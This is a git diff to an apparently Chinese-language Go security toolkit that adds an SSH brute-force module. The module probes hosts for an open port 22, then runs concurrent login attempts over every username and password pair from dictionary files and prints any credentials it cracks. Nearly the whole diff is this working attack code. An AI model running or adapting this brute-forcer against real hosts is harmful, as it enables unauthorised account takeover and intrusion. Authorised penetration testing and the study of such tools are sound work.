diff --git a/src/genmai/ArgParser/ParameterParser.go b/src/genmai/ArgParser/ParameterParser.go index 9623b3c..3bf31f5 100755 --- a/src/genmai/ArgParser/ParameterParser.go +++ b/src/genmai/ArgParser/ParameterParser.go @@ -9,6 +9,7 @@ import( "strconv" "log" "main/genmai" + "main/tools/SSHExplosion" ) var Num int @@ -184,4 +185,25 @@ func WKPWD(WKPWD string ,PWDList []string){ fmt.Println("弱密码已生成") } return +} +//SSH爆破 +func SSHBurst (SSHBurst string,SSHBurstList []string){ + if SSHBurst =="true"{ + SSHHostCheck,list:=IPCheck(SSHBurstList[0]) + if SSHHostCheck!="true"{ + fmt.Println("host格式报错",list) + log.Println("host格式报错") + }else{ + poolNums,err:= strconv.Atoi(SSHBurstList[1]) + if err!=nil{ + fmt.Println(err) + log.Println(err) + }else{ + + SSHExplosion.SshExp(list[:],poolNums) + + } + } + } + return } \ No newline at end of file diff --git a/src/main b/src/main index a486748..bab1d54 100755 Binary files a/src/main and b/src/main differ diff --git a/src/main.go b/src/main.go index 3a6fa08..8184a94 100755 --- a/src/main.go +++ b/src/main.go @@ -26,6 +26,7 @@ type Vul struct{ MD string //生成MD文件 RemoteAssessment string //远程检测,所需参数在RAVUL中 WKPWD string //弱口令生成,所需参数在WKPWDVUL结构体中 + SSHBurst string //SSH爆破 } type RAVUL struct{ @@ -71,7 +72,7 @@ func main(){ //远程模块参数 RA := flag.Bool("RA", false, "使用远程检测,只能单独使用模块") - flag.StringVar(&RAV.SSHHost, "H", "false", "远程检测指定host") + flag.StringVar(&RAV.SSHHost, "host", "false", "远程检测指定host") flag.StringVar(&RAV.SSHUser, "user", "false", "远程检测指定用户") flag.StringVar(&RAV.SSHPassword, "passwd", "false", "远程登录密码") @@ -81,7 +82,12 @@ func main(){ flag.StringVar(&WKV.CompanyName, "CPN", "0", "设置特定公司名") flag.StringVar(&WKV.Name, "Name", "0", "设置姓名") flag.StringVar(&WKV.Nums, "Nums", "0", "设置特殊数字(如年份)") - // return + + // SSH爆破模块 + SSHB:= flag.Bool("SSHBurst", false, "使用SSH爆破") + + + // All := flag.Bool("all", false, "只扫描system,kernel的所有poc以及检测baselin模块,不可联合其他参数使用") @@ -92,6 +98,8 @@ func main(){ //将插件模块的值存放到数组中 PWDList :=[...]string{WKV.CompanyName,WKV.Name,WKV.Nums} + poolNums:=strconv.Itoa(vul.ParserNum) + SSHBurstList :=[...]string{RAV.SSHHost,poolNums} //初始化bool值 sAll :=strconv.FormatBool(*All) @@ -99,6 +107,7 @@ func main(){ vul.RemoteAssessment=strconv.FormatBool(*RA) vul.WKPWD=strconv.FormatBool(*WK) help:=strconv.FormatBool(*Help) + vul.SSHBurst =strconv.FormatBool(*SSHB) //是否开启远程检测 if vul.RemoteAssessment=="true"{ @@ -113,6 +122,8 @@ func main(){ }else{ ArgParser.WKPWD(vul.WKPWD,PWDList[:]) + ArgParser.SSHBurst(vul.SSHBurst,SSHBurstList[:]) + return ArgParser.ParameterParser(vul.System,vul.Kernel,vul.Web,vul.BaseLine,sAll,vul.PoolStatNum,vul.ParserNum,vul.Update,vul.IP,help) } return diff --git a/src/tools/SSHExplosion/CheckAlive.go b/src/tools/SSHExplosion/CheckAlive.go new file mode 100644 index 0000000..ef4ba1e --- /dev/null +++ b/src/tools/SSHExplosion/CheckAlive.go @@ -0,0 +1,16 @@ +package SSHExplosion + +import( + "net" + "fmt" + "time" +) + +func checkAlive(ip string) bool { + alive := false + _, err := net.DialTimeout("tcp", fmt.Sprintf("%v:%v", ip, "22"), time.Second*5) + if err == nil { + alive = true + } + return alive + } \ No newline at end of file diff --git a/src/tools/SSHExplosion/ReadFile.go b/src/tools/SSHExplosion/ReadFile.go index 62d2e76..fda21ca 100644 --- a/src/tools/SSHExplosion/ReadFile.go +++ b/src/tools/SSHExplosion/ReadFile.go @@ -1,33 +1,26 @@ package SSHExplosion import( - "log" - "io" + // "log" + // "io" "os" "bufio" + "strings" ) -//用户名 -func readName(path string)(listName []string){ - //打开文件 - file, err := os.Open(path) //只是用来读的时候,用os.Open。相对路径,针对于同目录下。 - if err != nil{ - log.Printf("打开文件失败,err:%v\n",err) - return - } - defer file.Close() //关闭文件,为了避免文件泄露和忘记写关闭文件 - //使用buffio读取文件内容 - reader := bufio.NewReader(file) //创建新的读的对象 - for { - line , err := reader.ReadString('\n') //注意是字符,换行符。 - if err == io.EOF{ - log.Println("文件读完了") - break - } - if err != nil{ //错误处理 - log.Printf("读取文件失败,错误为:%v",err) - return - } - listName =append(listName,line) - } - return listName -} +func readFile(filename string) ([]string, error) { + file, err := os.Open(filename) + if err != nil { + return nil, err + } + defer file.Close() + scanner := bufio.NewScanner(file) + scanner.Split(bufio.ScanLines) + var result []string + for scanner.Scan() { + passwd := strings.TrimSpace(scanner.Text()) + if passwd != "" { + result = append(result, passwd) + } + } + return result, err +} \ No newline at end of file diff --git a/src/tools/SSHExplosion/SSHConnect.go b/src/tools/SSHExplosion/SSHConnect.go index ee151b9..f5c222f 100755 --- a/src/tools/SSHExplosion/SSHConnect.go +++ b/src/tools/SSHExplosion/SSHConnect.go @@ -25,84 +25,11 @@ func SshConnect(ip, username, password string) (bool, error) { if err == nil { defer client.Close() session, err := client.NewSession() - errRet := session.Run("echo 飞雪无情") + errRet := session.Run(" ") if err == nil && errRet == nil { defer session.Close() success = true } } return success, err -} -// func SshConnect(SSHHost string,SSHUser string, SSHPassword string)(result string){ - -// sshHost := SSHHost - -// sshUser := SSHUser - -// sshPassword := SSHPassword - -// sshType := "password" - -// sshPort := 22 - - -// //创建sshp登陆配置 - -// config := &ssh.ClientConfig{ - -// Timeout: 5*time.Second,//ssh 连接time out 时间一秒钟, 如果ssh验证错误 会在一秒内返回 - -// User: sshUser, - -// HostKeyCallback: ssh.InsecureIgnoreHostKey(), - -// //HostKeyCallback: hostKeyCallBackFunc(h.Host), - -// } - -// if sshType == "password" { - -// config.Auth = []ssh.AuthMethod{ssh.Password(sshPassword)} - -// } - -// //dial 获取ssh client - -// addr := fmt.Sprintf("%s:%d", sshHost, sshPort) - -// sshClient, err := ssh.Dial("tcp", addr, config) - -// if err != nil { - -// log.Fatal("创建ssh client 失败",err) -// } - -// defer sshClient.Close() - -// //创建ssh-session - -// session, err := sshClient.NewSession() - -// if err != nil { - -// log.Fatal("创建ssh session 失败",err) - - -// } - -// defer session.Close() -// command :="whoami" -// //执行远程命令 -// combo,err := session.CombinedOutput(command) - -// if err != nil { - -// log.Fatal("远程执行cmd 失败",err,command) - - -// } -// log.Println("ssh connect succ") -// defer session.Close() -// result=string(combo) -// return result -// } \ No newline at end of file +} \ No newline at end of file diff --git a/src/tools/SSHExplosion/SSHCoprogram.go b/src/tools/SSHExplosion/SSHCoprogram.go index 9974a0e..dca9d9d 100644 --- a/src/tools/SSHExplosion/SSHCoprogram.go +++ b/src/tools/SSHExplosion/SSHCoprogram.go @@ -2,8 +2,7 @@ package SSHExplosion import ( "fmt" "sync" - // "time" - "strings" + "log" ) // Pool goroutine Pool @@ -46,31 +45,72 @@ func (p *Pool) Wait() { p.wg.Wait() } -func SSHCoprogram(vul map[string]interface{}) { +type Task struct { + ip string + user string + password string + } + +func SSHCoprogram(vul map[string]interface{}){ readNameFile:=vul["readNameFile"].([]string) readPWDFile:=vul["readPWDFile"].([]string) - host:=vul["ip"].(string) + host:=vul["ip"].([]string) nums:=vul["nums"].(int) - fmt.Println(len(readNameFile),len(readPWDFile)) - // 这里限制100个并发 - pool := New(nums) // sync.WaitGroup{} - //假设需要发送1000万个http请求,然后我并发100个协程取完成这件事 - for j := 0; j < len(readNameFile); j++{ - for i := 0; i < len(readPWDFile); i++ { - pool.Add(1) //发现已存在100个人正在发了,那么就会卡住,直到有人完成了宣布自己退出协程了 - go func(i int) { - // fmt.Println(j,i,readPWDFile[i],host) - username := readNameFile[j] - username = strings.Replace(username,"\n","",-1) - passwd := readPWDFile[i] - passwd = strings.Replace(passwd,"\n","",-1) - result, _:=SshConnect(host,username,passwd) - if result { - fmt.Println("suc : ",host,username,passwd) - } - pool.Done() - }(i) - } - pool.Wait() + + + var tasks []Task + for _, user := range readNameFile { + for _, password := range readPWDFile { + for _, ip := range host { + tasks = append(tasks, Task{ip, user, password}) + } + } } + + runTask(tasks,nums) + +} + + +func runTask(tasks []Task, threads int) { + var wg sync.WaitGroup + taskCh := make(chan Task, threads*2) + for i := 0; i < threads; i++ { + go func() { + for task := range taskCh { + success, _ := SshConnect(task.ip, task.user, task.password) + if success { + fmt.Printf("破解%v成功,用户名是%v,密码是%v\n", task.ip, task.user, task.password) + }else{ + log.Printf("破解%v失败,用户名是%v,密码是%v\n",task.ip, task.user, task.password) + } + wg.Done() + } + }() + } + for _, task := range tasks { + wg.Add(1) + taskCh <- task + } + wg.Wait() + close(taskCh) + } + + + +//检测开启ssh的IP +func checkAlivePool(ipList []string,nums int)(aliveIP []string){ + pool := New(nums) + for _,ip:=range ipList{ + pool.Add(1) + go func(ip string) { + v:=checkAlive(ip) + if v{ + aliveIP=append(aliveIP,ip) + } + pool.Done() + }(ip) + } + pool.Wait() + return aliveIP } \ No newline at end of file diff --git a/src/tools/SSHExplosion/SshExplosion.go b/src/tools/SSHExplosion/SshExplosion.go index b4be3c7..18e2fa8 100644 --- a/src/tools/SSHExplosion/SshExplosion.go +++ b/src/tools/SSHExplosion/SshExplosion.go @@ -1,19 +1,19 @@ package SSHExplosion import( - // "fmt" + "fmt" ) -func SshExp(){ - var readNameFile []string - var readPWDFile []string - - readNameFile=readName("../data/dic/name.txt") - readPWDFile=readName("../data/dic/dic.txt") +func SshExp(ipList []string ,nums int){ + readNameFile,err:=readFile("../data/dic/name.txt") + readPWDFile,err1:=readFile("../data/dic/dic.txt") + fmt.Println(readNameFile,err,err1) vul:=make(map[string]interface{}) + aliveIP:=checkAlivePool(ipList[:],nums) + vul["readNameFile"]=readNameFile vul["readPWDFile"]=readPWDFile - vul["ip"]="127.0.0.1" - vul["nums"]=500 + vul["ip"]=aliveIP + vul["nums"]=nums SSHCoprogram(vul) } \ No newline at end of file